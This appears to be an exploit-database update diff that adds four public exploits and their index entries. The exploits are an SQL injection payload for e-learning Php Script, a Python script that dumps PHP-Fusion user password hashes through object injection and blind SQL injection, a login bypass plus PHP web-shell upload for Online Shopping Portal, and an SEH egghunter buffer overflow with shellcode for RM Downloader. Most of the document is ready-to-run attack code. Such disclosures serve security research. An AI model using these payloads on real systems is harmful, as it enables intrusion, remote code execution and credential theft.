DB: 2020-07-02

4 changes to exploits/shellcodes

RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)
e-learning Php Script 0.1.0 - 'search' SQL Injection
PHP-Fusion 9.03.60 - PHP Object Injection
Online Shopping Portal 3.1 - Authentication Bypass

exploits/php/webapps/48629.txt

@@ -0,0 +1,38 @@
+# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
+# Date: 2020-06-29
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
+# Software Link: https://github.com/amitkolloldey/elearning-script
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+Source code(search.php):
+                     <?php
+                     if(isset($_GET['search_submit'])){
+                     $search_key = $_GET['search'];
+                     $search = "select * from posts where post_keywords 
+like '%$search_key%'";
+                     $run_search = mysqli_query($con,$search);
+                     $count = mysqli_num_rows($run_search);
+                     if($count == 0){
+                     echo "<h2>No Result Found.Please Try With Another 
+Keywords.</h2>";
+                     }else{
+                     while($search_row = 
+mysqli_fetch_array($run_search)):
+                     $post_id = $search_row ['post_id'];
+                     $post_title = $search_row ['post_title'];
+                     $post_date = $search_row ['post_date'];
+                     $post_author = $search_row ['post_author'];
+                     $post_featured_image = $search_row ['post_image'];
+                     $post_keywords = $search_row ['post_keywords'];
+                     $post_content = substr($search_row 
+['post_content'],0,200);
+                     ?>
+
+Payload:
+         http://127.0.0.1/e/search.php?search=a&search_submit=Search
+         http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 
+FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT 
+(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM 
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search

exploits/php/webapps/48630.txt

@@ -0,0 +1,205 @@
+# Exploit Title: PHP-Fusion 9.03.60 - PHP Object Injection
+# Date: 2020-05-26
+# Exploit Author: coiffeur
+# Vendor Homepage: https://www.php-fusion.co.uk/home.php
+# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
+# Version: v9.03.60
+
+# Description:
+# PHP Object Injection to SQL injection (pre-auth)
+
+
+import sys
+
+import requests
+
+import subprocess
+
+GENERATOR_NAME = "gen.php"
+GENERATOR_CONTENT = """<?php
+if (count($argv) < 2) {
+    echo 'Usage: php gen.php "<PAYLOAD>"';
+    die;
+}
+
+$ar["comment_item_id"] = "1";
+$ar["comment_item_type"] = $argv[1];
+
+$payload = urlencode(base64_encode(serialize($ar)));
+echo $payload;
+?>
+"""
+
+
+DEBUG = 1
+DELTA = None
+TRESHOLD = 0.60
+LIKE = "f%admin"
+COLUMNS = ["user_id", "user_name", "user_algo", "user_salt", "user_password",
+           "user_admin_algo", "user_admin_salt", "user_admin_password", "user_email"]
+
+
+def usage():
+    banner = """NAME: PHPFusion v9.03.50, PHP Object Injection to SQL injection
+SYNOPSIS: python poi_to_sqli_9.03.50.py <URL>
+DESCRIPTION:
+    Dump the content of the table named fusionX...X_users
+AUTHOR: coiffeur
+    """
+    print(banner)
+
+
+def generator(action):
+    if action == "w":
+        with open(GENERATOR_NAME, "w") as f:
+            f.write(GENERATOR_CONTENT)
+    if action == "r":
+        _ = subprocess.Popen(["rm", GENERATOR_NAME], stdout=subprocess.PIPE)
+
+
+def generate_payload(text):
+    p = subprocess.Popen(["php", GENERATOR_NAME, text], stdout=subprocess.PIPE)
+    out, _ = p.communicate()
+    return out
+
+
+def check(payload):
+    datas = {"comment_options": generate_payload(payload)}
+    r = requests.post(
+        url=f"{sys.argv[1]}/includes/classes/PHPFusion/Feedback/Comments.ajax.php", data=datas)
+    return r.elapsed.total_seconds()
+
+
+def evaluate_delay():
+    global DELTA
+    deltas = []
+    payload = "' UNION SELECT SLEEP(2)-- - '"
+    for _ in range(3):
+        deltas.append(check(payload))
+    DELTA = sum(deltas)/len(deltas)
+
+
+def get_tbl_name_len():
+    i = 0
+    while 1:
+        payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
+        if check(payload) >= DELTA*TRESHOLD:
+            return i-1
+        if i > 100:
+            print(f"[x] Exploit failed")
+            exit(-1)
+        i += 1
+
+
+def get_tbl_name(length):
+    tbl_name = ""
+    for i in range(1, length+1):
+        min, max = 0, 127-1
+        while min < max:
+            mid = (max + min) // 2
+            payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
+            if check(payload) >= DELTA*TRESHOLD:
+                max = mid
+            else:
+                min = mid + 1
+        tbl_name += chr(min)
+        if DEBUG:
+            print(f"[DEBUG] Table name: {tbl_name}")
+    return tbl_name
+
+
+def get_rows_number(tbl_name):
+    i = 0
+    while 1:
+        payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '"
+        if check(payload) >= DELTA*TRESHOLD:
+            return i
+        i += 1
+
+
+def get_elt_len(tbl_name, column_name, offset):
+    i = 0
+    while 1:
+        payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
+        if check(payload) >= DELTA*TRESHOLD:
+            if DEBUG:
+                print(
+                    f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}")
+            return i-1
+        i += 1
+
+
+def get_elt(tbl_name, column_name, offset, length):
+    elt = ""
+    for i in range(1, length+1):
+        min, max = 0, 127-1
+        while min < max:
+            mid = (max + min) // 2
+            payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
+            if check(payload) >= DELTA*TRESHOLD:
+                max = mid
+            else:
+                min = mid + 1
+        elt += chr(min)
+        if DEBUG:
+            print(
+                f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}")
+    print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}")
+    return elt
+
+
+def get_rows(tbl_name, row_number):
+    print(f"[*] Trying to dump {tbl_name}")
+    rows = []
+    for offset in range(row_number):
+        row = []
+        for column_name in COLUMNS:
+            elt_length = get_elt_len(tbl_name, column_name, offset)
+            row.append(get_elt(tbl_name, column_name, offset, elt_length))
+        print(f"[*] Row {offset}: {row}")
+        rows.append(row)
+    print(f"[*] Rows: {rows}")
+
+
+def main():
+    if len(sys.argv) < 2:
+        print(usage())
+        exit(-1)
+
+    if DEBUG:
+        print(f"[*] Target: {sys.argv[1]}")
+
+    if DEBUG:
+        print(f"[DEBUG] Writting generator to {GENERATOR_NAME}")
+    generator("w")
+
+    evaluate_delay()
+    if DEBUG:
+        print(f"[*] Delta: {DELTA}")
+
+    tbl_name_len = get_tbl_name_len()
+    if DEBUG:
+        print(
+            f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}")
+
+    tbl_name = get_tbl_name(tbl_name_len)
+    print(f"    Table name: {tbl_name}")
+
+    prefix = f"{tbl_name.split('_')[0]}_"
+    print(f"[*] Prefix: {prefix}")
+
+    user_table_name = f"{prefix}users"
+
+    number_of_rows = get_rows_number(user_table_name)
+    if DEBUG:
+        print(f"[*] {user_table_name} got {number_of_rows} rows")
+
+    get_rows(user_table_name, number_of_rows)
+
+    if DEBUG:
+        print(f"[DEBUG] Removing  {GENERATOR_NAME}")
+    generator("r")
+
+
+if __name__ == "__main__":
+    main()

exploits/php/webapps/48631.txt

@@ -0,0 +1,43 @@
+# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass
+# Date: 2020-06-25
+# Exploit Author: Ümit Yalçın
+# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
+# Version: 3.1
+# Tested on: Windows 10 / WampServer
+
+1- Authentication Bypass
+
+Go to following url!
+http://localhost/shopping/admin/
+
+Default admin username is admin, to bypass authentication use sql bypass like '# or ' OR 1=1#
+
+username = admin'#
+passwrod = what ever you want
+
+
+2- Uploading Shell to Remote Code Execution
+
+After bypassed the authentication go to insert-product field
+http://localhost/shopping/admin/insert-product.php
+
+
+after that, upload you shell , as an example
+
+<?php
+$exe = shell_exec($_REQUEST['cmd']);
+echo $exe;
+?>
+
+
+and go to http://localhost/shopping/admin/productimages/ and all possible folders named with number from 1 like 
+
+http://localhost/shopping/admin/productimages/1
+http://localhost/shopping/admin/productimages/2
+http://localhost/shopping/admin/productimages/3
+http://localhost/shopping/admin/productimages/4
+http://localhost/shopping/admin/productimages/5
+
+When you find your shell, for example you found at 21
+
+TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE

exploits/windows/local/48628.py

@@ -0,0 +1,76 @@
+# Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC) 
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-29
+# Vulnerable Software: RM Downloader
+# Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe
+# Version: 2.50.60 2006.06.23
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+# Proof of Concept:
+
+#   1.- Run the python script, it will create a new file "RM_LCE.txt"
+#   2.- Copy the content of the new file 'RM_LCE.txt' to clipboard
+#   3.- Turn off DEP for RMDownloader.exe
+#   4.- Open 'RMDownloader.exe'
+#   5.- Go to 'Load' tab
+#   6.- Paste clipboard in 'Load' parameter
+#   7.- Click on button 'OK'
+#   8.- Two messageboxes will pop up, click OK
+#   9.- Calc.exe runs.
+
+#################################################################################################################################################
+
+#Python "RM_LCE.py" Code:
+
+f= open("RM_LCE.txt", "w")
+
+junk="\x41" * 336
+
+
+egg = "w00tw00t"
+
+# msfvenom -p windows/exec cmd=calc.exe --platform windows -f py  -b "\x0a\x0d\x00"
+
+buf =  ""
+buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29"
+buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda"
+buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48"
+buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b"
+buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81"
+buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e"
+buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf"
+buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79"
+buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8"
+buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95"
+buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62"
+buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6"
+buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb"
+buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee"
+buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90"
+buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59"
+buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec"
+
+
+nseh ="\xeb\x06\x90\x90"
+
+#1002C531   5B               POP EBX
+#1002C532   58               POP EAX
+#1002C533   C3               RETN
+#C:\Program Files\RM Downloader\RDutility02.dll
+
+
+seh="\x31\xc5\x02\x10"
+
+nops="\x90" * 20
+
+egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
+egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t
+egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
+
+
+
+payload = junk + egg + buf + nseh + seh + nops + egghunter 
+
+f.write(payload)
+f.close

files_exploits.csv

@@ -11116,6 +11116,7 @@ id,file,description,date,author,type,platform,port
 48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows,
 48624,exploits/windows/local/48624.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-06-26,"Ethan Seow",local,windows,
 48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows,
+48628,exploits/windows/local/48628.py,"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)",2020-07-01,"Paras Bhatia",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42883,3 +42884,6 @@ id,file,description,date,author,type,platform,port
 48623,exploits/php/webapps/48623.txt,"OpenEMR 5.0.1 - 'controller' Remote Code Execution",2020-06-26,"Emre ÖVÜNÇ",webapps,php,
 48626,exploits/php/webapps/48626.txt,"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting",2020-06-30,"Anushree Priyadarshini",webapps,php,
 48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,
+48629,exploits/php/webapps/48629.txt,"e-learning Php Script 0.1.0 - 'search' SQL Injection",2020-07-01,KeopssGroup0day_Inc,webapps,php,
+48630,exploits/php/webapps/48630.txt,"PHP-Fusion 9.03.60 - PHP Object Injection",2020-07-01,coiffeur,webapps,php,
+48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,